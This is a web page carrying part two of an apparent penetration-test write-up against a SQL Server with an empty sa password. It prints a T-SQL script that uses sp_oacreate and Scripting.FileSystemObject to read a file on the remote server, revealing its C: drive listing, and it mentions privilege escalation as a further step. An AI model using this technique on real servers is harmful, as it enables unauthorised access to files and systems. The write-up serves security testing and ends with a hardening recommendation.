北天软件工作室
北天软件集网站建设、网站开发、软件开发、网站优化SEO、网站宣传、网站开发成一体的网络公司。北天软件是专业的网站建设、网站开发、设计、制作和网站国际推广、搜索引擎推广的网络公司。口号:考虑企业所需,实现企业所想。JAVA技术网热情为java爱好者服务,本网内容包括JAVA(JSP、servlet、EJB、webservice、j2ee、javabean、应用服务器、JavaScript),数据库(MYSQL、SQL Server、Sybase、Oracle、DB2、数据库综合知识),设计研究(设计模式、Struts、Spring、Hibernate、设计框架、设计综合知识),WEB2.0新技术(主要介绍AJAX),以及各种技术的入门、实例、例子等等,欢迎各位多来坐坐!◆  诚邀各位JAVA爱好者加盟!◆  本网站内容丰富,更新快,保证每周20篇以上!   旧版java技术网 | 设为首页 | 文章搜索 | RSS订阅地图
免费使用JavaCMS自助建站系统
  文章搜索:   
初学者园地  javascript  java技术  .Net技术 XML/WebService  数据库技术  web2.0技术  设计模式  设计框架  SEO技术  综合知识
您现在的位置是: 北天软件门户网>>数据库技术>>详细信息
一次简单的sqlserver的安全测试(2)


在sql server的查询分析器里面我们在远程执行这个脚本,成功以后我们就可以利用ie去远程的服务器上调用这个文件来执行里面的程序。



ie执行成功以后,我们再利用另外一个sql脚本来查看结果。

     -- scripting.filesystemobject example - read a known filedeclare @o int, @f int, @t int, @ret intdeclare @line varchar(8000)exec sp_oacreate ''scripting.filesystemobject'', @o outexec sp_oamethod @o, ''opentextfile'', @f out, ''c:\i0.sys'', 1exec @ret = sp_oamethod @f, ''readline'', @line outwhile( @ret = 0 )beginprint @lineexec @ret = sp_oamethod @f, ''readline'', @line outend   




ok,我们可以从sql server中远程看到对方服务器的c盘文件列表了,当然你还可以做很多其他的事情,比如提升你的权限等等。但是做为远程渗透服务测试来说,我们已经圆满的完成了客户的要求。

事后分析来看对方的网络管理员其实对服务器做了很多配置,所以留下这个sa的空口令可能是因为一些其他的原因,我们知道sql server2000安装的时候其实是没有这个空口令问题的,客户可能是由于内部客户端的一些使用上的原因而留下的这个问题,我已经建议客户去给数据库一个强壮的口令以解决这个问题了。
关闭窗口 】   【 返回首页
推荐文章
· sqlserver2000允许用...
· sqlserver2000存在严...
· microsoftsql的多个...
· sqlserver2000的安全...
· sqlserver2000的安全...
· sqlserver2000的安全...
· sqlserversp_mssetser...
· sqlserver数据库的一...
· sqlserver数据库的一...
· sqlserver数据库的一...
· sqlserver数据库的一...
· 关于sqlserver的若干...
· sqlserver2000bulk插...
· sqlserver到oracle连...
· sqlserver2000服务器...
· 解sqlserver“数据库...
· sqlserver数据库口令...
· 如何恢复sqlserver数...
· sqlserver的巩固及有...
· sqlserver中这个表的...
北天软件工作室 粤ICP备06079815号 版权所有©2006-2008
精彩出品 JavaCMS自助建站 (C)2006-2008 www.it3838.com limited.all rights reserved.
Powered by JavaCMS V2.6.0